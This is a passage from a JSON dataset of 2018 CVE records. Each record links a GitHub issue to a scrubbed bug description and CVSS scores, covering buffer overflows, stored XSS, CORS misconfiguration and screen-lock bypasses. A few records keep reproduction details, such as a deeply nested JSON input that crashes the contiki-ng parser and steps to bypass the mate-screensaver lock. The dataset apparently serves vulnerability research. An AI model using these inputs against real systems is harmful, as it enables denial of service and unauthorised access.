        "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/655",
        "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/655",
        "Repo_new": "jbeder/yaml-cpp",
        "Issue_Created_At": "2018-12-28T08:13:29Z",
        "description": "Stack Overflow in APITAG . Stack Overflow in APITAG position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20574",
        "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/654",
        "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/654",
        "Repo_new": "jbeder/yaml-cpp",
        "Issue_Created_At": "2018-12-28T07:51:02Z",
        "description": "Stack Overflow in APITAG Stack Overflow in APITAG position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20579",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/601",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/601",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2018-07-11T12:51:10Z",
        "description": "Stack based buffer overflow while parsing JSON file. Function APITAG that implements stack push operation does not check whether new elements are still within allocated buffer. It returns error only before ending the function, but this value is never checked in JSON parser, so the next push operations are not blocked. PATHTAG define JSONPARSE_MAX_DEPTH NUMBERTAG Declaration of the buffer: PATHTAG struct jsonparse_state { ... char stack[JSONPARSE_MAX_DEPTH]; }; Function APITAG PATHTAG static int push(struct jsonparse_state state, char c) { state >stack[state >depth] = c; state >depth++; state >vtype NUMBERTAG return state >depth APITAG json[state >pos]; s = jsonparse_get_type(state); v = state >vtype; state >pos++; switch(c) { case '{': if((s NUMBERTAG s == '[' || s == ':') { push(state, c); Vulnerability is not likely to be used for Remote Code Execution exploit, because it allows to only put two types of characters to this stack: left curly bracket ({), left square bracket ([), so the risk was reduced APITAG None, Integrity: Low, Scope: Unchanged). However it is quite easy to overwrite the function return address on stack or stack canary, which leads to crash of the application (via segmentation fault) and can be used by attacker for Denial of Service attacks. Additionally, the risk of this issue is also reduced APITAG APITAG because attacker would need to parse malicious JSON, however it is quite possible when using JSON input data in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG Medium) Following JSON will trigger crash: {\"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { \"a\": { or using square brackets: {\"a\": APITAG Mitigation : Function APITAG should not allow to add new elements to the stack after reaching the limit (JSONPARSE_MAX_DEPTH). Functions using the APITAG function should check the returned value. Crash details using Address Sanitizer NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG at pc NUMBERTAG ERRORTAG NUMBERTAG f1 bp NUMBERTAG ffd NUMBERTAG c1c5a0 sp NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG thread T NUMBERTAG ERRORTAG NUMBERTAG f0 in push PATHTAG NUMBERTAG ERRORTAG NUMBERTAG f0 in jsonparse_next PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG c1c NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG af in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG state' APITAG NUMBERTAG b8c0: f1 f1 f1 f NUMBERTAG f4]f4 f4 f3 f3 f3 f NUMBERTAG b8d NUMBERTAG b8e NUMBERTAG b8f NUMBERTAG b NUMBERTAG b NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20583",
        "Issue_Url_old": "https://github.com/thephpleague/commonmark/issues/337",
        "Issue_Url_new": "https://github.com/thephpleague/commonmark/issues/337",
        "Repo_new": "thephpleague/commonmark",
        "Issue_Created_At": "2018-12-30T01:47:42Z",
        "description": "XSS Vulnerability NUMBERTAG An XSS vulnerability has been reported in this library. We're opening this issue so we have a place to provide further details once the fix is available. No action is required at this time.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20584",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/192",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/192",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2018-12-29T05:40:28Z",
        "description": "hang in jasper. when jasper converted output format jp2,it hanged. ./jasper input APITAG output /dev/null output format jp2 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20588",
        "Issue_Url_old": "https://github.com/caryll/otfcc/issues/59",
        "Issue_Url_new": "https://github.com/caryll/otfcc/issues/59",
        "Repo_new": "caryll/otfcc",
        "Issue_Created_At": "2018-12-30T08:37:39Z",
        "description": "global buffer overflow in PATHTAG Test Version dev version, git clone FILETAG Test Program PATHTAG [infile] Asan Debug Information ERRORTAG POC file APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20591",
        "Issue_Url_old": "https://github.com/libming/libming/issues/168",
        "Issue_Url_new": "https://github.com/libming/libming/issues/168",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-12-20T07:03:46Z",
        "description": "Heap buffer overflow problem in APITAG function in util/decompile.c of libming NUMBERTAG Hi, there. A Heap buffer overflow problem was discovered in APITAG function in util/decompile.c of libming NUMBERTAG This problem can be reproduced in the latest code base, too. A crafted input can cause segment faults and I have confirmed them with address sanitizer too. Here is the POC file. Please use the \"./swftocxx $POC /dev/null\" to reproduce the bug. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20592",
        "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/237",
        "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/237",
        "Repo_new": "michaelrsweet/mxml",
        "Issue_Created_At": "2018-12-13T05:48:57Z",
        "description": "Multiple crashes when running xmldoc. We detected several crashes with our fuzzer when mxml is compiled with APITAG including buffer overflow (heap based or stack based), and use after free. POCs (files ending with APITAG ) and error messages (files ending with APITAG ) are put inside this directory URLTAG . The triggering command is APITAG (w/o setting xml, POC is the \"source file\").",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20594",
        "Issue_Url_old": "https://github.com/hs-web/hsweb-framework/issues/107",
        "Issue_Url_new": "https://github.com/hs-web/hsweb-framework/issues/107",
        "Repo_new": "hs-web/hsweb-framework",
        "Issue_Created_At": "2018-12-29T02:57:09Z",
        "description": "\u5b89\u5168\u95ee\u9898. \u60a8\u597d\uff1a APITAG framework\u4e2d\u5b58\u5728\u5982\u4e0b\u4e09\u4e2a\u5b89\u5168\u95ee\u9898\u3002 \u4e00\uff1a\u53cd\u5c04\u578bxss NUMBERTAG FILETAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG csrf NUMBERTAG FILETAG APITAG NUMBERTAG FILETAG PATHTAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20616",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/4",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/4",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2018-12-31T11:53:39Z",
        "description": "heap buffer overflow in ok file APITAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG Asan Debug Information ERRORTAG POC file CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20617",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/5",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/5",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2018-12-31T13:20:47Z",
        "description": "heap buffer overflow in /ok file APITAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG $ gcc o csv_decode csv_decode.c ok_csv.h ok_csv.c Asan Debug Information ERRORTAG POC file CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20618",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/6",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/6",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2018-12-31T13:55:19Z",
        "description": "heap buffer overflow in PATHTAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG $ gcc o mo_decode mo_decode.c ok_mo.h ok_mo.c Asan Debug Information ERRORTAG POC file CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20652",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/104",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/104",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2018-12-31T13:56:35Z",
        "description": "Program crash due to Out of memory in function APITAG Hi, there. I test the program at the master branch. CODETAG An Out of Memory problem was discovered in function APITAG in tinyexr.h. The program tries to allocate with a large number size NUMBERTAG b NUMBERTAG b NUMBERTAG bytes) of memory. Program crash because of terminating called after throwing an instance of 'std::bad_alloc' Please use the \"./test_tinyexr $POC\" to reproduce the bug. FILETAG I will show you the output as follow. APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20659",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/350",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/350",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-12-31T15:52:26Z",
        "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash7.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20663",
        "Issue_Url_old": "https://github.com/cuba-platform/reports/issues/140",
        "Issue_Url_new": "https://github.com/cuba-platform/reports/issues/140",
        "Repo_new": "cuba-platform/reports",
        "Issue_Created_At": "2018-12-21T13:58:43Z",
        "description": "Permanent XSS attack through . APITAG Environment Platform version NUMBERTAG APITAG APITAG Client type: Web APITAG Browser: tested in Firefox and Chrome APITAG Description of the bug or enhancement Login and navigate to APITAG > Reports_ Click APITAG > New_ In the name field, type ERRORTAG Click APITAG and close_ Edit the newly created report by double click or click & Edit Hover mouse over the tab with the text APITAG report \"<img src=x o..._ FILETAG Expected behavior: nothing happens Actual behavior: javascript code is executed FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-20676",
        "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27044",
        "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27044",
        "Repo_new": "twbs/bootstrap",
        "Issue_Created_At": "2018-08-10T09:04:03Z",
        "description": "tooltip XSS on data viewport attribute. found in bootstrap NUMBERTAG APITAG \" APITAG over me APITAG URLTAG Win NUMBERTAG Chrome NUMBERTAG Firefo NUMBERTAG Bit)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20677",
        "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27045",
        "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27045",
        "Repo_new": "twbs/bootstrap",
        "Issue_Created_At": "2018-08-10T09:07:08Z",
        "description": "affix XSS on target config. found in bootstrap NUMBERTAG ERRORTAG URLTAG Win NUMBERTAG Chrome NUMBERTAG Firefo NUMBERTAG Bit)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20680",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/22",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/22",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-31T07:53:42Z",
        "description": "Frog CMS NUMBERTAG has xss in PATHTAG body field. Frog CMS NUMBERTAG has xss in PATHTAG body field NUMBERTAG login APITAG exp ERRORTAG FILETAG NUMBERTAG save and close NUMBERTAG open FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-20681",
        "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/170",
        "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/170",
        "Repo_new": "mate-desktop/mate-screensaver",
        "Issue_Created_At": "2018-09-14T04:52:26Z",
        "description": "Lock Screen not working after monitor plugged / unplugged (need to restart mate screensaver). Expected behaviour When unplug / unplug the monitor, Lock Screen should work like before Actual behaviour When unplug / unplug the monitor, Lock Screen does not work unless I restart mate screensaver Steps to reproduce the behaviour Login to MATE with a laptop while external monitor is attached via HDMI Select from menu: System > Lock Screen > It works, now we unlock the screen Unplug the HDMI cable Select from menu: System > Lock Screen > nothing happens Run APITAG Select from menu: System > Lock Screen > It works again MATE general version NUMBERTAG Package version mate screensaver NUMBERTAG Linux Distribution Linux Mint NUMBERTAG Tara Link to downstream report of your Distribution",
        "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 5.2,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2018-20681",
        "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/155",
        "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/155",
        "Repo_new": "mate-desktop/mate-screensaver",
        "Issue_Created_At": "2018-05-01T20:44:51Z",
        "description": "mate screensaver screen lock can be bypassed by power cycling monitor. Expected behaviour Lock Screen Turn off monitor Turn monitor on Start typing Expect to see lock screen on monitor Actual behaviour Lock Screen Turn off monitor Turn monitor on Start typing Expect to see lock screen on monitor Steps to reproduce the behaviour CODETAG Wait NUMBERTAG seconds Lock screen (I used Window manager shortcut) Wait NUMBERTAG seconds Power off monitor (soft off) Wait NUMBERTAG seconds Power on monitor Wait NUMBERTAG seconds (that's how long it takes monitor to boot) Can see and use PATHTAG it is (effectively) unlocked. Notes/logs: APITAG reports: after APITAG Screensaver is not running! ERRORTAG The screensaver is inactive APITAG The screensaver is not inhibited APITAG The screensaver is active APITAG The screensaver is not inhibited APITAG mate screensaver no daemon debug` FILETAG Wait NUMBERTAG seconds Lock screen (I used Window manager shortcut) FILETAG Wait NUMBERTAG seconds Power off monitor (soft off) FILETAG FILETAG Wait NUMBERTAG seconds Power on monitor FILETAG FILETAG Wait NUMBERTAG seconds (that's how long it takes monitor to boot) Can see and use PATHTAG it is (effectively) unlocked. FILETAG (there is no FILETAG or FILETAG or FILETAG (blank during that time)) Troubleshooting This occurred on two machines. Home Machine Problem occurred on Ubuntu NUMBERTAG do not have logs unfortunately) Unsure what version of mate it was at the time If relevant monitor was NUMBERTAG Uses nvidia drivers Upgrading to Ubuntu NUMBERTAG which upgraded mate to NUMBERTAG fixed the problem on home machine. Work Machine Problem occurred on Ubuntu NUMBERTAG mate NUMBERTAG do not have logs unfortunately) Upgrading to Ubuntu NUMBERTAG mate NUMBERTAG did NOT fix the problem. If relevant monitor is NUMBERTAG Problem still occurs if I switch to different resolution Has no dedicated video card/using intel onboard graphics monitor is a USB hub.. problem still reproduces if I disconnect the usb cable and have the keyboard connected some other way. Please let me know what other logs/steps may be useful. MATE general version NUMBERTAG Package version mate screensaver NUMBERTAG See attached FILETAG for full list of all mate related package versions Linux Distribution Ubuntu NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 5.2,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2018-20681",
        "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/152",
        "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/152",
        "Repo_new": "mate-desktop/mate-screensaver",
        "Issue_Created_At": "2018-04-10T19:53:17Z",
        "description": "mate screensaver does not maintain user lockout / screen lock under certain conditions. Expected behaviour mate screensaver should keep the user's session locked until valid authentication has taken place (password entered, etc.) Actual behaviour & steps to reproduce the behaviour Do the following NUMBERTAG Have two display port attached displays on a fresh install of Fedora NUMBERTAG Mine are in ports NUMBERTAG in case that makes any difference. Login to MATE NUMBERTAG Press ctrl alt L or allow the screensaver timeout to lock the screen NUMBERTAG a. Bump the mouse or type a key on the keyboard before the displays have either been placed into power save mode or put to sleep: < MATE presents the password prompt and the user's windows remain hidden until the password has been correctly entered NUMBERTAG b. Bump the mouse or type a key on the keyboard after the displays have been put into power save mode, but before they have been put to sleep: < MATE presents the unlock with password prompt, but displays (doesn't hide) the windows of your desktop. You cannot interact with the applications or windows until the password has been correctly entered, but the content is plainly visible as described by other users in this bug NUMBERTAG c. Bump the mouse to type a key on the keyboard after the displays have been put to sleep: < MATE blanks one display where the password dialog box would have been, the other is available for interaction WITHOUT having entered in the correct password. New applications can be launched, all applications may be used with the same privilege level of the user who had previously logged in and believed that their desktop was locked. > MATE general version NUMBERTAG Package version CODETAG Linux Distribution Fedora NUMBERTAG Link to downstream report of your Distribution I may have to open a new bug with Fedora / RH since I didn't open this one originally > CVETAG",
        "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 5.2,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2018-20723",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2215",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/2215",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2018-12-16T05:07:28Z",
        "description": "Stored XSS in APITAG field Color . Description There's no escape being done before printing out the value of Name in the Color Template page. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Name field value. Payload ERRORTAG Visit URLTAG the payload will be triggered. APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-20724",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2212",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/2212",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2018-12-15T11:31:18Z",
        "description": "Stored XSS in APITAG Hostname\" field. Description There's no escape being done before printing out the value of Hostname value in the Data collectors table. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Hostname field value. Payload ERRORTAG Visit FILETAG payload will be triggered. APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-20725",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2214",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/2214",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2018-12-16T05:03:25Z",
        "description": "Stored XSS in APITAG Label\" field Graph. Description There's no escape being done before printing out the value of Vertical Label in the Graphic templates page. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Vertical label field value. Payload ERRORTAG Visit FILETAG the payload will be triggered. APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-20726",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2213",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/2213",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2018-12-16T04:56:37Z",
        "description": "Stored XSS in APITAG Hostname\" field Data collectors . Description There's no escape being done before printing out the value of Hostname value in the Tree table. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Hostname field value. Payload ERRORTAG Visit URLTAG payload will be triggered. APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-20742",
        "Issue_Url_old": "https://github.com/ucbrise/opaque/issues/66",
        "Issue_Url_new": "https://github.com/mc2-project/opaque-sql/issues/66",
        "Repo_new": "mc2-project/opaque-sql",
        "Issue_Created_At": "2018-12-01T08:19:39Z",
        "description": "Security: No boundary check on APITAG . CODETAG APITAG could be a pointer to memory in enclave. It could casue a arbitrary memory write in enclave. Fix\uff1a Add a wrapper function of APITAG , checking the returned value with APITAG / sgx_is_outside_enclave . There is a sample below. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20743",
        "Issue_Url_old": "https://github.com/mumble-voip/mumble/issues/3505",
        "Issue_Url_new": "https://github.com/mumble-voip/mumble/issues/3505",
        "Repo_new": "mumble-voip/mumble",
        "Issue_Created_At": "2018-08-27T15:48:38Z",
        "description": "Rate limiting of channel joins. Malicious clients that are rapidly muting/unmuting, switching channels or posting text Messages (couple hundred times per second) are able to cause server instabilities: the murmur server simply hangs after a few seconds. We suspect the sqlite database to be the bottleneck that causes this behavior, but have no way to verify this, as attacks occur irregulary and only lasts for short amounts of time. Is there a way to rate limit such requests? External processes via ICE are not working for this purpose, as the server locks up regardless.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20744",
        "Issue_Url_old": "https://github.com/rs/cors/issues/55",
        "Issue_Url_new": "https://github.com/rs/cors/issues/55",
        "Repo_new": "rs/cors",
        "Issue_Created_At": "2018-05-12T08:14:21Z",
        "description": "CORS security: reflecting any origin header value when configured to is dangerous. When CORS policy is configured to APITAG \"), current go CORS handler will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past. Some similar security issues: URLTAG URLTAG Some related blog posts: FILETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-20745",
        "Issue_Url_old": "https://github.com/yiisoft/yii2/issues/16193",
        "Issue_Url_new": "https://github.com/yiisoft/yii2/issues/16193",
        "Repo_new": "yiisoft/yii2",
        "Issue_Created_At": "2018-04-29T14:01:17Z",
        "description": "CORS security: reflecting any origin header value when configured to is dangerous. When CORS policy is configured to , current Yii2 CORS filter will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past. Some similar security issues: URLTAG URLTAG URLTAG URLTAG Some related blog posts: FILETAG URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-20748",
        "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/273",
        "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/273",
        "Repo_new": "libvnc/libvncserver",
        "Issue_Created_At": "2018-12-13T10:37:17Z",
        "description": "SECURITY: malloc((uint NUMBERTAG t)length NUMBERTAG is unsafe, especially on NUMBERTAG bit systems. The fixes for NUMBERTAG are incomplete, as I explained in: URLTAG APITAG fix appears to be to add casts to (uint NUMBERTAG t) before adding NUMBERTAG in those many APITAG calls. On platforms with larger than NUMBERTAG bit size_t, this should be sufficient against integer overflows since the sizes are read from NUMBERTAG bit protocol fields, but it isn't sufficient to prevent maliciously large memory allocation on the client by a rogue server. On a platform with NUMBERTAG bit size_t, this isn't even sufficient to prevent the integer overflows.\"",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20755",
        "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14102",
        "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14102",
        "Repo_new": "modxcms/revolution",
        "Issue_Created_At": "2018-10-02T03:58:45Z",
